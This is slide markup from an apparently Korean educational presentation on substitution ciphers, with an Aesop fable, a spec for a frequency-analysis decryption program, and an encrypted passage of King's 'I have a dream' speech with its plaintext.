                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C8BD474-216F-4863-B008-EF9499B2944A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7319061" y="6460508"/>
            <a:ext cx="3553906" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>익숙한 단어 추측 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: P -&gt; r</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="화살표: 오른쪽 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{670D9653-134A-4DB4-817A-9A3B5F65817A}"/>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1" name="Picture 2" descr="양피지 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C33161-371B-45A2-B122-7E009C183C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5102" y="465083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F9B0E9D1-525D-4A17-BA85-34429CFDFE88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315103" y="4717397"/>
            <a:ext cx="4007178" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>thefoxandthegrapesonehotsummersdayafoxwasstrollingthroughanorc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>hardtilhecametoabunchofgrapesjustripeningonavinewhichhadbeentra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> inedoveraloftybranchjustthetoquenchmythirstquothhedrawingbackafe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>wpaceshetookarunandajumpandjustmissedthebunchturningroundaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>inwithonetwothreehejumpedupbutwithnogreatersuccessagainandagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> nhetriedafterthetemptingmorselbutatlasthadtogiveitupandwalkedaway withhisnoseintheairsayingiamsuretheyaresouritiseasytodespisewhaty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>oucannotget</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A33873BB-686C-47AC-8F07-C4F1D544D574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="6376735"/>
            <a:ext cx="5515557" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 해독 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>- 『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이솝우화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 나오는 「여우와 포도」 이야기</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="그룹 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9679B20-0403-42DC-81D1-FC6E79BB3DE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="사각형: 둥근 모서리 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01DEBA27-CE9A-47B7-8BF1-126528C7FC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F304A772-6205-4549-AE4A-67B4EE265B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3" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E76CED90-3A2D-4338-A91D-C1C1589B7B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4" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA6AC800-AEC5-447E-BD12-2E8D1357D46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19613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723425905"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3933092" y="2813240"/>
          <a:ext cx="3807061" cy="985393"/>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Inforsec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Defcybsec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국방 사이버 보안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Circles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문화부</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>정보보호반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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="그룹 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B925BBD3-86A5-4B0B-ACE7-2E70C507DD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A79163A-3E56-4CE1-AD2B-9D4449A9007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0387FE1-EE61-4C37-A22D-93E0EBD582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EE733366-F45D-4A18-B7EA-937105854A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783825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331067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치환 암호 어려워 보인다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변환기 부터 제작 해 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>프로그래밍 조건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다음 페이지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에 맞추어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암호문을 입력에 따라 변환할 수 있는 프로그램을 제작한다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ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>제작된 변환기로 치환 암호를 변환한다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331067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암호의 변환기를 제작할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제목 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{589EA8FA-46FB-4686-899F-B1DACCCC164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 변환기</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292570202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736725"/>
            <a:ext cx="10515600" cy="4763358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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1.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>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     27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알파벳의 빈도수를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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>크기정렬</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단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>,  “:” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이후 숫자의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7</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      1   B:     11   C:1111111   “)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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변경할 알파벳 입력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>&gt;&gt;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은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>대문자 알파벳</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en-US" altLang="ko-KR" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>done</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외에 입력이 들어오면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대문자 알파벳을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라고 오류 메시지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“done” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이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들어 올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지금까지의 변환된 메시지를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>“decrypted.txt” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>에 저장 후 프로그램을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어떤 알파벳으로 변경하시겠습니까</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>? &gt;&gt;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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>번과 마찬가지로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소문자 알파벳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>“done”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 외에는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 오류 처리를 해준다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입력된 두개의 문자로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문자열 치환 룰</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FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>업데이트</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한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>. ( ex) A-&gt; a, A-&gt; b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>치환 시 앞의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>A-&gt; a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>는 무시된다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3.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>현재까지의 문자열 치환 룰에 따라 치환된 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-&gt;     b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 알파벳의 치환 표를 출력 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“-&gt;” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이후 문자의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6</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“A-&gt;     b   B-&gt;     c   C-&gt;     d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치환된 암호문에 대해</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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번의 출력을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빈도수는 대문자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소문자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알파벳에 대하여 구한다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2</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endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54150835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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t>APS ZU BMS THAAMT KB SOP CHAAPJ MQ LPUWHKX. K UHJ SM JMZ SMLHJ VJ QXKPBLU -- UM PCPB SOMZDO TP QHEP SOP LKQQKEZASKPU MQ SMLHJ HBL SMVMXXMT, K USKAA OHCP H LXPHV. KS KU H LXPHV LPPWAJ XMMSPL KB SOP HVPXKEHB LXPHV.K OHCP H LXPHV SOHS MBP LHJ SOKU BHSKMB TKAA XKUP ZW HBL AKCP MZS SOP SXZP VPHBKBD MQ KSU EXPPL : "TP OMAL SOPUP SXZSOU SM IP UPAQ-PCKLPBS, SOHS HAA VPB HXP EXPHSPL PGZHA." K OHCP H LXPHV SOHS MBP LHJ MB SOP XPL OKAAU MQ DPMXDKH SOP UMBU MQ QMXVPX UAHCPU HBL SOP UMBU MQ QMXVPX UAHCP MTBPXU TKAA IP HIAP SM UKS LMTB SMDPSOPX HS SOP SHIAP MQ IXMSOPXOMML.K OHCP H LXPHV SOHS MBP LHJ PCPB SOP USHSP MQ VKUUKUUKWWK, H USHSP UTPASPXKBD TKSO SOP OPHS MQ KBFZUSKEP, UTPASPXKBD TKSO SOP OPHS MQ MWWXPUUKMB, TKAA IP SXHBUQMXVPL KBSM HB MHUKU MQ QXPPLMV HBL FZUSKEP.K OHCP H LXPHV SOHS VJ QMZX AKSSAP EOKALXPB TKAA MBP LHJ AKCP KB H BHSKMB TOPXP SOPJ TKAA BMS IP FZLDPL IJ SOP EMAMX MQ SOPKX URKB IZS IJ SOP EMBSPBS MQ SOPKX EOHXHESPX.K OHCP H LXPHV SMLHJ.K OHCP H LXPHV SOHS MBP LHJ LMTB KB HAHIHVH, TKSO KSU CKEKMZU XHEKUSU, TKSO KSU DMCPXBMX OHCKBD OKU AKWU LXKWWKBD TKSO SOP TMXLU MQ KBSPXWMUKSKMB HBL BZAAKQKEHSKMB -- MBP LHJ XKDOS SOPXP KB HAHIHVH AKSSAP IAHER IMJU HBL IAHER DKXAU TKAA IP HIAP SM FMKB OHBLU TKSO AKSSAP TOKSP IMJU HBL TOKSP DKXAU HU UKUSPXU HBL IXMSOPXU.K OHCP H LXPHV SMLHJ.K OHCP H LXPHV SOHS MBP LHJ PCPXJ CHAAPJ UOHAA IP PNHASPL, HBL PCPXJ OKAA HBL VMZBSHKB UOHAA IP VHLP AMT, SOP XMZDO WAHEPU TKAA IP VHLP WAHKB, HBL SOP EXMMRPL WAHEPU TKAA IP VHLP USXHKDOS, HBL SOP DAMXJ MQ SOP AMXL UOHAA IP XPCPHAPL HBL HAA QAPUO UOHAA UPP KS SMDPSOPX.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" b="1"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74796786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45435F4B-63E0-49B8-8BAE-B5735077E1A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1509712" y="1841500"/>
            <a:ext cx="8982075" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21875683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해석</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id="{9125593F-A5B7-46F5-9CDE-989ADF3AEA2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1425463" y="1851011"/>
            <a:ext cx="9163050" cy="3819525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A1F8561-EAEF-482F-8E92-83B837A6BF44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3916545" y="5874818"/>
            <a:ext cx="4321147" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Marthi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Luter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. King </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>“I have a dream”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32643496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Let us not wallow in the valley of despair. I say to you, my friends, we have the difficulties of today and tomorrow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>I still have a dream. It is a dream deeply rooted in the American dream.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>I have a dream that one day this nation will rise up and live out the true meaning of its creed. We hold these truths to be self-evident that all men are created equal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>I have a dream that one day out in the red hills of Georgia the sons of former slaves and the sons of former slaveowners will be able to sit down together at the table of brotherhood.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
